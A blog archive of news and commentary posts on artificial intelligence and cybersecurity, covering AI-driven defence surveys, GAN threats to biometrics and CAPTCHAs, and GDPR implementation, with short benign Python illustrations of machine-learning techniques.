Category Archives: artificial intelligence

Natural Language-Focused AI From OpenAI Shows Promise, Creates Stories With Humor

Is it possible that an AI exists, or will exist in the near future, that is too dangerous to release as open source and should not be uploaded to the …

The post Natural Language-Focused AI From OpenAI Shows Promise, Creates Stories With Humor appeared first on The Cyber Security Place.

E Hacking News – Latest Hacker News and IT Security News: Artificial Intelligence To Aid Scientists Understand Earth Better

According to a recent study, computer science is set to join forces with geography: with the help of Artificial Intelligence, the complex processes of planet Earth could be understood far better.

Researchers at Friedrich Schiller University carried out the study, which makes clear that AI has a great deal to contribute to the Earth and life sciences.

Climatic conditions and the Earth's systems would become substantially easier to comprehend.

This improved understanding would, in turn, help refine the existing models of processes on the Earth's surface.

Before AI got involved, investigations of the Earth dealt mainly with static elements, such as soil properties at a global scale.

Thanks to Artificial Intelligence, more advanced techniques can now be employed to handle dynamic processes.

Variations in global land processes such as photosynthesis could now be monitored, and their implications anticipated in advance.


Earth system data from a myriad of sensors is now available, so tracking and comprehending the planet's processes with the aid of AI becomes a far more manageable job.

This new collaboration is promising because processes that defy direct human analysis could now be estimated.

Image recognition, natural language processing and classical machine learning applications are all encompassed within the newly available techniques.

Hurricanes, fire spread and other complex processes driven by local conditions are some examples of potential applications.

Soil movement, vegetation dynamics, ocean transport and other core themes of Earth science and Earth systems also fall within the scope of these applications.

Data-dependent statistical techniques, however good the data quality, are not always verifiable and are hence susceptible to misuse.

Hence, machine learning needs to be an essential part of the approach, which would also help address the demands of storage capacity and data processing.

If physical modelling and machine learning techniques were brought together, they would make a huge difference: it would then be possible to model the motion of ocean water and to predict the temperature of the sea surface.
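To make the "best of both worlds" idea concrete, below is a minimal sketch of one common hybrid pattern: a simplified physical baseline predicts sea surface temperature, and a machine learning model is trained only on the baseline's residuals. The toy data, the baseline formula and the feature choices are illustrative assumptions, not the study's actual method.

    # Hypothetical hybrid-model sketch: physical baseline + ML residual correction.
    import numpy as np
    from sklearn.ensemble import RandomForestRegressor

    rng = np.random.default_rng(0)

    # Synthetic stand-in observations: day of year and latitude -> sea surface temp.
    day = rng.uniform(0, 365, 1000)
    lat = rng.uniform(-60, 60, 1000)
    sst_obs = (20 - 0.25 * np.abs(lat)
               + 3.0 * np.sin(2 * np.pi * day / 365)
               + rng.normal(0, 0.5, 1000))

    def physical_baseline(day, lat):
        # Deliberately simplified "physics": latitude gradient plus seasonal cycle.
        return 20 - 0.25 * np.abs(lat) + 2.5 * np.sin(2 * np.pi * day / 365)

    # The ML model learns only what the physics misses (the residual).
    residual = sst_obs - physical_baseline(day, lat)
    X = np.column_stack([day, lat])
    ml_correction = RandomForestRegressor(n_estimators=100, random_state=0).fit(X, residual)

    def hybrid_predict(day, lat):
        features = np.column_stack([day, lat])
        return physical_baseline(day, lat) + ml_correction.predict(features)

    print(hybrid_predict(np.array([180.0]), np.array([45.0])))

The physical part keeps predictions consistent with known dynamics, while the learned correction absorbs effects the simplified equations leave out.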

As one of the researchers behind the study put it, the main motive is to bring together the “best of both worlds.”

In light of this study, issuing warnings about natural calamities and other extreme events, including climate and weather hazards, would become easier than ever before.


Website uses Artificial Intelligence to create utterly realistic human faces

By Waqas

A new way for cybercriminals to create fake social media profiles and carry out identity scams using an Artificial Intelligence-powered tool? A couple of months ago it was reported that NVIDIA had developed a tool that uses Artificial Intelligence to create extremely realistic human faces which in reality do not exist. Now, there is a website that […]

This is a post from HackRead.com Read the original post: Website uses Artificial Intelligence to create utterly realistic human faces

Blog | Avast EN: Windows Malware for Macs and More Weekly News | Avast

Phishing scam has fishy URLs

There’s a phishing campaign afoot that tries to scam users into believing their email accounts have been compromised. The phishing email claims multiple verification errors have caused the users’ accounts to be blacklisted and that the only fix is an immediate login with the proper credentials. The email provides a link that reads CONFIRM YOUR EMAIL, and when users click on it, they are taken to a fake login page tailored to their particular email service. If they enter their credentials, the info is sent back to the attackers’ C&C (command-and-control) server.



Blog | Avast EN

Machine learning fundamentals: What cybersecurity professionals need to know

In this Help Net Security podcast, Chris Morales, Head of Security Analytics at Vectra, talks about machine learning fundamentals, and illustrates what cybersecurity professionals should know. Here’s a transcript of the podcast for your convenience. Hi, this is Chris Morales and I’m Head of Security Analytics at Vectra, and in this Help Net Security podcast I want to talk about machine learning fundamentals that I think we all need to know as cybersecurity professionals. AI … More

The post Machine learning fundamentals: What cybersecurity professionals need to know appeared first on Help Net Security.

Mozilla will use AI coding assistant to preemptively catch Firefox bugs

Mozilla will start using Clever-Commit, an AI coding assistant developed by Ubisoft, to make the Firefox code-writing process more efficient and to prevent the introduction of bugs in the code. How does Clever-Commit work? “By combining data from the bug tracking system and the version control system (aka changes in the code base), Clever-Commit uses artificial intelligence to detect patterns of programming mistakes based on the history of the development of the software. This allows … More
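Clever-Commit's internals aren't described beyond the quote above, but the general technique, learning the patterns of commits that were later linked to bug fixes and then scoring new commits, can be sketched. Everything below (the sample diffs, the labels, the model choice) is a hypothetical illustration, not Ubisoft's or Mozilla's implementation.

    # Hypothetical sketch of a commit-risk classifier trained on commit history.
    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.linear_model import LogisticRegression
    from sklearn.pipeline import make_pipeline

    # Training data joined from version control and the bug tracker:
    # diff text of past commits, labelled 1 if a later bug fix pointed at them.
    past_diffs = [
        "if (ptr) free(ptr); free(ptr);",      # double free  -> buggy
        "for (i = 0; i <= n; i++) a[i] = 0;",  # off-by-one   -> buggy
        "return value == NULL ? 0 : value->x;",
        "log.debug('retry %d', attempt);",
    ]
    was_buggy = [1, 1, 0, 0]

    model = make_pipeline(
        TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5)),
        LogisticRegression(),
    )
    model.fit(past_diffs, was_buggy)

    # Score an incoming commit before it lands.
    new_diff = ["while (i <= len) buf[i++] = read();"]
    print("risk score:", model.predict_proba(new_diff)[0][1])

A real system would use far richer signals (touched files, author history, AST-level patterns), but the loop is the same: mine the bug tracker for labels, learn, then flag risky changes at review time.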

The post Mozilla will use AI coding assistant to preemptively catch Firefox bugs appeared first on Help Net Security.

Nearly two-thirds of organizations say tech skills gap is impacting IT audits

Technologies such as AI are reshaping the future of IT auditors, but auditors are largely optimistic about the future, according to new research from ISACA. In the Future of IT Audit, a survey of more than 2,400 IT auditors worldwide, 92 percent of respondents said they are optimistic about how technology will impact them professionally over the next five years. Nearly 8 in 10 say their IT audit team has … More

The post Nearly two-thirds of organizations say tech skills gap is impacting IT audits appeared first on Help Net Security.

Are Applications of AI in Cybersecurity Delivering What They Promised?

Many enterprises are using artificial intelligence (AI) technologies as part of their overall security strategy, but results are mixed on the post-deployment usefulness of AI in cybersecurity settings.

This trend is supported by a new white paper from Osterman Research titled “The State of AI in Cybersecurity: The Benefits, Limitations and Evolving Questions.” According to the study, which included responses from 400 organizations with more than 1,000 employees, 73 percent of organizations have implemented security products that incorporate at least some level of AI.

However, 46 percent agree that rules creation and implementation are burdensome, and 25 percent said they do not plan to implement additional AI-enabled security solutions in the future. These findings may indicate that AI is still in the early stages of practical use and its true potential is still to come.

How Effective Is AI in Cybersecurity?

“Any ITDM should approach AI for security very cautiously,” said Steve Tcherchian, chief information security officer (CISO) and director of product at XYPRO Technology. “There are a multitude of security vendors who tout AI capabilities. These make for great presentations, marketing materials and conversations filled with buzz words, but when the rubber meets the road, the advancement in technology just isn’t there in 2019 yet.”

The marketing Tcherchian refers to has certainly drummed up considerable attention, but AI may not yet be delivering enough when it comes to measurable results for security. Respondents to the Osterman Research study noted that the AI technologies they have in place do not help mitigate many of the threats faced by enterprise security teams, including zero-day and advanced threats.

Still Work to Do, but Promise for the Future

While applications of artificial intelligence must still mature for businesses to realize their full benefits, many in the industry still feel the technology offers promise for a variety of applications, such as improving the speed of processing alerts.

“AI has a great potential because security is a moving target, and fixed rule set models will always be evaded as hackers are modifying their attacks,” said Marty Puranik, CEO of Atlantic.Net. “If you have a device that can learn and adapt to new forms of attacks, it will be able to at least keep up with newer types of threats.”

Research from the Ponemon Institute predicted several benefits of AI use, including cost-savings, lower likelihood of data breaches and productivity enhancements. The research found that businesses spent on average around $3 million fighting exploits without AI in place. Those who have AI technology deployed spent an average of $814,873 on the same threats, a savings of more than $2 million.

Help for Overextended Security Teams

AI is also being considered as a potential point of relief for the cybersecurity skills shortage. Many organizations are pinched to find the help they need in security, with Cybersecurity Ventures predicting the skills shortage will increase to 3.5 million unfilled cybersecurity positions by 2021.

AI can help security teams increase efficiency by quickly making sense of all the noise from alerts. This could prove to be invaluable because at least 64 percent of alerts per day are not investigated, according to Enterprise Management Associates (EMA). AI, in tandem with meaningful analytics, can help determine which alerts analysts should investigate and discern valuable information about what is worth prioritizing, freeing security staff to focus on other, more critical tasks.
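As a rough illustration of that triage idea, the sketch below scores incoming alerts with a classifier trained on past analyst verdicts so the riskiest alerts surface first. The features and labels are invented for the example and are not drawn from any particular product.

    # Hypothetical alert-triage sketch: rank alerts by predicted incident risk.
    import numpy as np
    from sklearn.ensemble import GradientBoostingClassifier

    # Features per alert: severity (1-5), asset criticality (1-5),
    # prior alerts from the same host in 24h, known-bad indicator match (0/1).
    X_train = np.array([
        [5, 5, 12, 1],
        [2, 1,  0, 0],
        [4, 3,  3, 1],
        [1, 2,  1, 0],
    ])
    y_train = [1, 0, 1, 0]  # 1 = analyst confirmed a true incident

    clf = GradientBoostingClassifier(random_state=0).fit(X_train, y_train)

    incoming = np.array([[3, 4, 7, 1], [1, 1, 0, 0]])
    scores = clf.predict_proba(incoming)[:, 1]
    for alert, score in sorted(zip(incoming.tolist(), scores), key=lambda t: -t[1]):
        print(f"risk={score:.2f} alert={alert}")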

“It promises great improvements in cybersecurity-related operations, as AI releases security engineers from the necessity to perform repetitive manual processes and provides them with an opportunity and time to improve their skills, learn how to use new tools, technologies,” said Uladzislau Murashka, a certified ethical hacker (CEH) at ScienceSoft.

Note that while AI offers the potential for quicker, more efficient handling of alerts, human intervention will continue to be critical. Applications of artificial intelligence will not replace humans on the security team anytime soon.

Paving an Intelligent Path Forward

It’s important to consider another group that is investing in AI technology and using it for financial gains: cybercriminals. Along with enterprise security managers, those who make a living by exploiting sensitive data also understand the potential AI has for the future. It will be interesting to see how these capabilities play out in the future cat-and-mouse game of cybersecurity.

AI in cybersecurity is still in the early stages of its evolution, and its potential has yet to be fully realized. As security teams continue to invest in and develop AI technologies, these capabilities will someday be an integral part of cyberdefense.

The post Are Applications of AI in Cybersecurity Delivering What They Promised? appeared first on Security Intelligence.

AI, cloud and security — top priorities for enterprise legal departments

A report released today indicates that legal professionals are at the forefront of piloting emerging technologies, such as AI and cloud, in the enterprise. Are you surprised? Legal departments are …

The post AI, cloud and security — top priorities for enterprise legal departments appeared first on The Cyber Security Place.

AI won’t solve all of our cybersecurity problems

AI is already supporting businesses with tasks ranging from determining marketing strategies, to driverless cars, to providing personalized film and music recommendations. And its use is expected to grow even further in the coming years. In fact, IDC found that spending on cognitive and AI systems will reach $77.6 billion in 2022, more than three times the $24.0 billion forecast for 2018. But the question remains – can businesses expect AI adoption to effectively protect … More

The post AI won’t solve all of our cybersecurity problems appeared first on Help Net Security.

Can AI Become Our New Cybersecurity Sheriff?

Two hospitals in Ohio and West Virginia turned patients away due to a ransomware attack that led to a system failure. The hospitals could not process any emergency patient requests. Hence, …

The post Can AI Become Our New Cybersecurity Sheriff? appeared first on The Cyber Security Place.

Companies getting serious about AI and analytics, 58% are evaluating data science platforms

New O’Reilly research found that 58 percent of today’s companies are either building or evaluating data science platforms – which are essential for companies that are keen on growing their data science teams and machine learning capabilities – while 85 percent of companies already have data infrastructure in the cloud. Companies are building or evaluating solutions in foundational technologies needed to sustain success in analytics and AI. These include data integration and Extract, Transform and … More

The post Companies getting serious about AI and analytics, 58% are evaluating data science platforms appeared first on Help Net Security.

AI May Soon Defeat Biometric Security, Even Facial Recognition Software

It’s time to face a stark reality: Threat actors will soon gain access to artificial intelligence (AI) tools that will enable them to defeat multiple forms of authentication — from passwords to biometric security systems and even facial recognition software — identify targets on networks and evade detection. And they’ll be able to do all of this on a massive scale.

Sounds far-fetched, right? After all, AI is difficult to use, expensive and can only be produced by deep-pocketed research and development labs. Unfortunately, this just isn’t true anymore; we’re now entering an era in which AI is a commodity. Threat actors will soon be able to simply go shopping on the dark web for the AI tools they need to automate new kinds of attacks at unprecedented scales. As I’ll detail below, researchers are already demonstrating how some of this will work.

When Fake Data Looks Real

Understanding the coming wave of AI-powered cyberattacks requires a shift in thinking and AI-based unified endpoint management (UEM) solutions that can help you think outside the box. Many in the cybersecurity industry assume that AI will be used to simulate human users, and that’s true in some cases. But a better way to understand the AI threat is to realize that security systems are based on data. Passwords are data. Biometrics are data. Photos and videos are data — and new AI is coming online that can generate fake data that passes as the real thing.

One of the most challenging AI technologies for security teams is a very new class of algorithms called generative adversarial networks (GANs). In a nutshell, GANs can imitate or simulate any distribution of data, including biometric data.

To oversimplify how GANs work, they involve pitting one neural network against a second neural network in a kind of game. One neural net, the generator, tries to simulate a specific kind of data and the other, the discriminator, judges the first one’s attempts against real data — then informs the generator about the quality of its simulated data. As this progresses, both neural networks learn. The generator gets better at simulating data, and the discriminator gets better at judging the quality of that data. The product of this “contest” is a large amount of fake data produced by the generator that can pass as the real thing.
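A toy version of that contest fits in a few lines. The sketch below, which assumes PyTorch, trains a generator to mimic a simple one-dimensional "real" distribution while a discriminator learns to tell real from fake; it is the same loop, at miniature scale, that produces convincing fake images or biometric data.

    # Minimal GAN sketch (PyTorch assumed): generator vs. discriminator.
    import torch
    import torch.nn as nn

    G = nn.Sequential(nn.Linear(8, 16), nn.ReLU(), nn.Linear(16, 1))               # generator
    D = nn.Sequential(nn.Linear(1, 16), nn.ReLU(), nn.Linear(16, 1), nn.Sigmoid()) # discriminator
    opt_g = torch.optim.Adam(G.parameters(), lr=1e-3)
    opt_d = torch.optim.Adam(D.parameters(), lr=1e-3)
    bce = nn.BCELoss()

    for step in range(2000):
        real = torch.randn(64, 1) * 0.5 + 3.0   # "real" data: normal around 3.0
        fake = G(torch.randn(64, 8))             # generator's attempt from noise

        # Discriminator learns to label real as 1 and fake as 0.
        d_loss = (bce(D(real), torch.ones(64, 1))
                  + bce(D(fake.detach()), torch.zeros(64, 1)))
        opt_d.zero_grad(); d_loss.backward(); opt_d.step()

        # Generator learns to make the discriminator call its fakes real.
        g_loss = bce(D(fake), torch.ones(64, 1))
        opt_g.zero_grad(); g_loss.backward(); opt_g.step()

    print("generated sample mean:", G(torch.randn(1000, 8)).mean().item())

As training progresses, the generated mean drifts toward 3.0: the generator has learned to produce data that passes the discriminator's test, which is exactly the property that makes GAN output dangerous when the "data" is a password list, a fingerprint or a face.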

GANs are best known as the foundational technology behind those deep fake videos that convincingly show people doing or saying things they never did or said. Applied to hacking consumer security systems, GANs have been demonstrated — at least, in theory — to be keys that can unlock a range of biometric security controls.

Machines That Can Prove They’re Human

CAPTCHAs are a form of lightweight website security you’re likely familiar with. By making visitors “prove” they’re human, CAPTCHAs act as a filter to block automated systems from gaining access. One typical kind of CAPTCHA asks users to identify numbers, letters and characters that have been jumbled, distorted and obfuscated. The idea is that humans can pick out the right symbols, but machines can’t.

However, researchers at Northwest University and Peking University in China and Lancaster University in the U.K. claimed to have developed an algorithm based on a GAN that can break most text-based CAPTCHAs within 0.05 seconds. In other words, they’ve trained a machine that can prove it’s human. The researchers concluded that because their technique uses a small number of data points for training the algorithm — around 500 test CAPTCHAs selected from 11 major CAPTCHA services — and both the machine learning part and the cracking part happen very quickly using a single standard desktop PC, CAPTCHAs should no longer be relied upon for front-line website defense.

Faking Fingerprints

One of the oldest tricks in the book is the brute-force password attack. The most commonly used passwords have been well-known for some time, and many people use passwords that can be found in the dictionary. So if an attacker throws a list of common passwords, or the dictionary, at a large number of accounts, they’re going to gain access to some percentage of those targets.

As you might expect, GANs can produce high-quality password guesses. Thanks to this technology, it’s now also possible to launch a brute-force fingerprint attack. Fingerprint identification — like the kind used by major banks to grant access to customer accounts — is no longer safe, at least in theory.

Researchers at New York University and Michigan State University recently conducted a study in which GANs were used to produce fake-but-functional fingerprints that also look convincing to any human. They said their method worked because of a flaw in the way many fingerprint ID systems work. Instead of matching the full fingerprint, most consumer fingerprint systems only try to match a part of the fingerprint.

The GAN approach enables the creation of thousands of fake fingerprints that have the highest likelihood of being matches for the partial fingerprints the authentication software is looking for. Once a large set of high-quality fake fingerprints is produced, it’s basically a brute-force attack using fingerprint patterns instead of passwords. The good news is that many consumer fingerprint sensors use heat or pressure to detect whether an actual human finger is providing the biometric data.
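A back-of-envelope calculation shows why partial matching favours the attacker: if each stored partial template falsely accepts a random print with some small probability, those odds compound across the templates a sensor stores, and compound again across a dictionary of GAN-generated fakes. The numbers below are illustrative assumptions, not measured rates.

    # Illustrative probability sketch for partial-fingerprint matching.
    p = 0.0001  # assumed false-accept rate of ONE partial template vs. a random print
    k = 12      # assumed partial templates stored per enrolled finger
    m = 1000    # assumed size of the attacker's fake-fingerprint dictionary

    accept_one_fake = 1 - (1 - p) ** k                 # any stored partial may match
    accept_dictionary = 1 - (1 - accept_one_fake) ** m

    print(f"false accept, single fake print: {accept_one_fake:.4%}")      # ~0.12%
    print(f"false accept, {m}-print dictionary: {accept_dictionary:.2%}") # ~70%

Under these toy numbers a single fake print rarely works, but a thousand tries succeed most of the time, which is the essence of a brute-force attack on partial matches.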

Is Face ID Next?

One of the most outlandish schemes for fooling biometric security involves tricking facial recognition software with fake faces. This was a trivial task with 2D technologies, in part because the capturing of 2D facial data could be done with an ordinary camera, and at some distance without the knowledge of the target. But with the emergence of high-definition 3D technologies found in many smartphones, the task becomes much harder.

A journalist working at Forbes tested four popular Android phones, plus an iPhone, using 3D-printed heads made by a company called Backface in Birmingham, U.K. The studio used 50 cameras and sophisticated software to scan the “victim.” Once a complete 3D image was created, the life-size head was 3D-printed, colored and, finally, placed in front of the various phones.

The results: All four Android phones unlocked with the phony faces, but the iPhone didn’t.

This method is, of course, difficult to pull off in real life because it requires the target to be scanned using a special array of cameras. Or does it? Constructing a 3D head out of a series of 2D photos of a person — extracted from, say, Facebook or some other social network — is exactly the kind of fake data that GANs are great at producing. It won’t surprise me to hear in the next year or two that this same kind of unlocking is accomplished using GAN-processed 2D photos to produce 3D-printed faces that pass as real.

Stay Ahead of the Unknown

Researchers can only demonstrate the AI-based attacks they can imagine — there are probably hundreds or thousands of ways to use AI for cyberattacks that we haven’t yet considered. For example, McAfee Labs predicted that cybercriminals will increasingly use AI-based evasion techniques during cyberattacks.

What we do know is that as we enter into a new age of artificial intelligence being everywhere, we’re also going to see it deployed creatively for the purpose of cybercrime. It’s a futuristic arms race — and your only choice is to stay ahead with leading-edge security based on AI.

The post AI May Soon Defeat Biometric Security, Even Facial Recognition Software appeared first on Security Intelligence.

2019 predictions – the year ahead for cybersecurity

2018 was a roller-coaster year for the tech industry – lots of big court cases and high-profile data privacy disagreements …

The post 2019 predictions – the year ahead for cybersecurity appeared first on The Cyber Security Place.

CIPL Submits Comments to ICDPPC Declaration on Ethics and Data Protection in AI

On January 25, 2019, the Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth submitted formal comments to the International Conference of Data Protection and Privacy Commissioners (the “International Conference”) on its Declaration on Ethics and Data Protection in Artificial Intelligence (the “Declaration”). The Declaration was adopted by the International Conference on October 23, 2018, for public consultation.

As we previously reported, the Declaration endorses several guiding principles as core values to preserve human rights as artificial intelligence technology develops. CIPL welcomes and shares many of the views expressed by the International Conference with respect to these six guiding principles.

In its comments on the Declaration, CIPL recommends several specific modifications and clarifications to the guiding principles: fairness; continued attention and vigilance, and accountability; transparency and intelligibility; responsible design and development; individual empowerment; and reducing or mitigating unlawful biases and discrimination.

These comments are intended to assist the newly set up International Conference permanent working group on Ethics and Data Protection in AI as it seeks to establish common governance principles on artificial intelligence at an international level.

To read CIPL’s recommendations on these principles, please view the full paper.

Break Through Cybersecurity Complexity With New Rules, Not More Tools

Let’s be frank: Chief information security officers (CISOs) and security professionals all know cybersecurity complexity is a major challenge in today’s threat landscape. Other folks in the security industry know this too — although some don’t want to admit it. The problem is that amid increasing danger and a growing skills shortage, security teams are overwhelmed by alerts and the growing number of complex tools they have to manage. We need to change that, but how? By completely rethinking our assumptions.

The basic assumption of security up until now is that new threats require new tools. After 12 years at IBM Security, leading marketing teams and making continuous contact with our clients — and, most recently, as VP of product marketing — I’ve seen a lot of promising new technology. But in our rapidly diversifying industry, there are more specialized products to face every kind of threat in an expanding universe of attack vectors. Complexity is a hidden cost of all these marvelous products.

It’s not just security products that contribute to the cybersecurity complexity conundrum; digitization, mobility, cloud and the internet of things (IoT) all contribute to the complexity of IT environments, making security an uphill battle for underresourced security teams. According to Forrester’s “Global Business Technographics Security Survey 2018,” 31 percent of business and IT decision-makers ranked the complexity of the IT environment among the biggest security challenges they face, tied with the changing nature of threats as the most-cited challenge.

I’ll give you one more mind-boggling statistic to demonstrate why complexity is the enemy of security: According to IBM estimates, enterprises use as many as 80 different security products from 40 vendors. Imagine trying to build a clear picture with pieces from 80 separate puzzles. That’s what CISOs and security operations teams are being asked to do.

7 Rules to Help CISOs Reduce Cybersecurity Complexity

The sum of the parts is not greater than the whole. So, we need to escape the best-of-breed trap to handle the problem of complexity. Cybersecurity doesn’t need more tools; it needs new rules.

Complexity requires us as security professionals and industry partners to turn the old ways of thinking inside out and bring in fresh perspectives.

Below are seven rules to help us think in new ways about the complex, evolving challenges that CISOs, security teams and their organizations face today.

1. Open Equals Closed

You can’t prevent security threats by piling on more tools that don’t talk to each other and create more noise for overwhelmed analysts. Security products need to work in concert, and that requires integration and collaboration. An open, connected, cloud-based security platform that brings security products together closes the gaps that point products leave in your defenses.

2. See More When You See Less

Security operations centers (SOCs) see thousands of security events every day — a 2018 survey of 179 IT professionals found that 55 percent of respondents handle more than 10,000 alerts per day, and 27 percent handle more than 1 million events per day. SOC analysts can’t handle that volume.

According to the same survey, one-third of IT professionals simply ignore certain categories of alerts or turn them off altogether. A smarter approach to the overwhelming volume of alerts leverages analytics and artificial intelligence (AI) so SOC analysts can focus on the most crucial threats first, rather than chase every security event they see.

3. An Hour Takes a Minute

When you find a security incident that requires deeper investigation, time is of the essence. Analysts can’t afford to get bogged down in searching for information in a sea of threats.

Human intelligence augmented by AI — what IBM calls cognitive security — allows SOC analysts to respond to threats up to 60 times faster. An advanced AI can understand, reason and learn from structured and unstructured data, such as news articles, blogs and research papers, in seconds. By automating mundane tasks, analysts are freed to make critical decisions for faster response and mitigation.

4. A Skills Shortage Is an Abundance

It’s no secret that greater demand for cybersecurity professionals and an inadequate pipeline of traditionally trained candidates has led to a growing skills gap. Meanwhile, cybercriminals have grown increasingly collaborative, but those who work to defend against them remain largely siloed. Collaboration platforms for security teams and shared threat intelligence between vendors are force multipliers for your team.

5. Getting Hacked Is an Advantage

If you’re not seeking out and patching vulnerabilities in your network and applications, you’re making an assumption that what you don’t know can’t hurt you. Ethical hacking and penetration testing turn hacking into an advantage, helping you find your vulnerabilities before adversaries do.

6. Compliance Is Liberating

More and more consumers say they will refuse to buy products from companies that they don’t trust to protect their data, no matter how great the products are. By creating a culture of proactive data compliance, you can exchange the checkbox mentality for continuous compliance, turning security into a competitive advantage.

7. Rigidity Is Breakthrough

The success of your business depends not only on customer loyalty, but also employee productivity. Balance security with productivity by practicing strong security hygiene. Run rigid but silent security processes in the background to stay out of the way of productivity.

What’s the bottom line here? Times are changing, and the current trend toward complexity will slow the business down, cost too much and fail to reduce cyber risk. It’s time to break through cybersecurity complexity and write new rules for a new era.


The post Break Through Cybersecurity Complexity With New Rules, Not More Tools appeared first on Security Intelligence.

Hunton Briefing Reflects on GDPR Implementation and Future Challenges

On January 16, 2019, Hunton Andrews Kurth hosted a breakfast seminar in London, entitled “GDPR: Post Implementation Review.” Bridget Treacy, Aaron Simpson and James Henderson from Hunton Andrews Kurth and Bojana Bellamy from the Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth discussed some of the challenges and successes companies encountered in implementing the EU General Data Protection Regulation (the “GDPR”), and also identified key data protection challenges that lie ahead. The Hunton team was joined by Neil Paterson, Group Data Protection Coordinator of TUI Group; Miles Briggs, Data Protection Officer of TUI UK & Ireland; and Vivienne Artz, Chief Privacy Officer at Refinitiv, who provided an in-house perspective on the GDPR.

The briefing provided an opportunity for companies (the “Companies”) to reflect on their achievements so far and to benchmark their GDPR experiences ahead of Data Protection Day, which is on January 28, 2019. A main takeaway of the day was that building a business-friendly privacy environment is an ongoing process that must be viewed from a global perspective.

We have summarized below some of the key discussion points from the seminar.

GDPR Implementation Insights

  • Generally Satisfied with Compliance: While the Companies were reasonably satisfied with the bulk of their GDPR implementation work and are now engaged in fine-tuning their data protection compliance programs, the Companies recognized that a number of challenges remain.
  • Global Privacy Challenges: Data Protection Officers are seeking to move their companies toward sustainable privacy programs that ensure GDPR compliance, yet also address global privacy challenges beyond the GDPR. The Companies view GDPR compliance as important, but not an end in itself, at least not given recent developments in other parts of the world, such as India, Brazil, etc. The Companies recognize privacy as the new normal, and are working to build efficient programs to address privacy challenges at an international level.
  • Maintaining a Culture of Privacy Awareness: Maintaining and developing a culture of privacy awareness within their companies is a key concern for privacy leaders. Some business leaders viewed the GDPR as a completed task once the implementation date of May 25, 2018, had passed, rather than an ongoing responsibility; and privacy leaders have been working hard to correct this view.
  • Territorial Scope: Many of the Companies have struggled to interpret the territorial scope of the GDPR. Insights from the European Data Protection Board’s Guidelines on Territorial Scope (3/2018), published in November 2018, have helped to clarify the position on topics such as the location of the protected data subjects, the use of non-EU based processors and the nature of a non-EU processor’s obligations.
  • Data Processing Agreements: Implementing Article 28 requirements continues to challenge the Companies, with a broad range of positions being adopted when negotiating data processing agreements. Negotiating liability caps and exclusions can be complex, due in part to the risk of reopening broader liability and other contractual issues. It will likely take some time for market practice to evolve.
  • Increased Training and Tech-enabled Compliance Tools: The Companies mentioned that, in the year ahead, conducting data protection training and awareness programs and rolling out tech-enabled compliance tools (e.g., for DPIAs and DSARs) will play a key part in enabling ongoing compliance with the GDPR.
  • GDPR and Future Privacy Challenges: The Companies stressed the difficulties encountered in interpreting and implementing GDPR obligations in the context of artificial intelligence, machine learning and the big data challenges of tomorrow. Companies will need to find innovative ways to accommodate big data while respecting data subject rights.

Regulatory Perspective

  • Increase in Complaints and Breach Reporting: As expected, data protection authorities (“DPAs”) have already been required to deal with a significant volume of complaints (on one report, 42,230 throughout the EU), and reports of data breaches (some 500 per week in the UK in the first few weeks after the GDPR took effect). Breach notifications across EU Member States have reached levels that are barely sustainable for most EU regulators. This is a consequence of the low notification threshold set by the GDPR, and of organizations adopting a very conservative approach towards notification. The ICO has reminded organizations that not all data breaches need to be reported. Other DPAs have a differing view, pointing to the need for more comprehensive guidance on this topic.
  • Inconsistency across Member States: There are already examples of inconsistent approaches by EU DPAs in relation to the implementation of the GDPR framework. Perhaps the starkest example of this is the 21 separate DPIA frameworks adopted at a national level. Staffing levels between DPAs differ, and differences in enforcement strategy are also likely. It will take time for differences to be reconciled, and in some areas, they will remain. Just as companies require time to embed and fine tune their implementation of the GDPR, regulators will also require time to adjust to the new regulatory environment.

Future Challenges

  • Moving Beyond Local Compliance to Global Privacy Accountability: Privacy frameworks are evolving and organizations face the challenge of moving their focus from local legal compliance to implementing a global operational privacy framework. The GDPR is now viewed as a template by countries seeking to craft new privacy laws. It offers a major step forward towards an operational privacy framework, but global privacy accountability will remain a challenge.
  • Local Challenges: Privacy leaders aspire to ensure that at every level of their organization, staff recognize the privacy issues raised by each decision, and assess the privacy risk for affected data subjects.
  • Future Challenges: Major legal challenges highlighted by participants included Brexit, the e-Privacy Regulation and the likelihood of legal challenges under the GDPR.

Hunton is hosting its next seminar in its London office on “Practical Insights on the Design and Implementation of Data Protection Impact Assessments,” on March 6, 2019.

National Data Privacy Day Is Wishful Thinking

You have to have a supreme sense of irony, or be in major denial, to call Monday, Jan. 28, Data Privacy Day. Given the current state of big data collection

The post National Data Privacy Day Is Wishful Thinking appeared first on The Cyber Security Place.

Is AI the Answer to never-ending Cybersecurity Problems?

Paul German, CEO, Certes Networks, talks about the impact and benefits of Artificial Intelligence (AI)-driven cybersecurity, and how AI adoption is helping organisations stay ahead in the never-ending game that is cybersecurity.

Artificial Intelligence (AI) isn’t going anywhere anytime soon. With 20% of the C-suite already using machine learning and 41% of consumers believing that AI will improve their lives, wide scale adoption is imminent across every industry - and cybersecurity is no exception. A lot has changed in the cyber landscape over the past few years and AI is being pushed to the forefront of conversations. It’s becoming more than a buzzword and delivering true business value. Its ability to aid the cybersecurity industry is increasingly being debated; some argue it has the potential to revolutionise cybersecurity, whilst others insist that the drawbacks outweigh the benefits.

With several issues facing the current cybersecurity landscape such as a disappearing IT perimeter, a widening skills gap, increasingly sophisticated cyber attacks and data breaches continuing to hit headlines, a remedy is needed. The nature of stolen data has also changed - CVV and passport numbers are becoming compromised, so coupled with regulations such as GDPR, organisations are facing a minefield.

Research shows that 60% think AI has the ability to find attacks before they do damage. But is AI the answer to the never-ending cybersecurity problems facing organisations today?

The Cost-Benefit Conundrum
On one hand, AI could provide an extremely large benefit to the overall framework of cybersecurity defences. On the other, the reality that it equally has the potential to be a danger under certain conditions cannot be ignored. Hackers are fast gaining the ability to foil security algorithms by targeting the data AI technology is training on. Inevitably, this could have devastating consequences.

AI can be deployed by both sides - by the attackers and the defenders. It does have a number of benefits such as the ability to learn and adapt to its current learning environment and the threat landscape. If it was deployed correctly, AI could consistently collect intelligence about new threats, attempted attacks, successful data breaches, blocked or failed attacks and learn from it all, fulfilling its purpose of defending the digital assets of an organisation. By immediately reacting to attempted breaches, mitigating and addressing the threat, cybersecurity could truly reach the next level as the technology would be constantly learning to detect and protect.

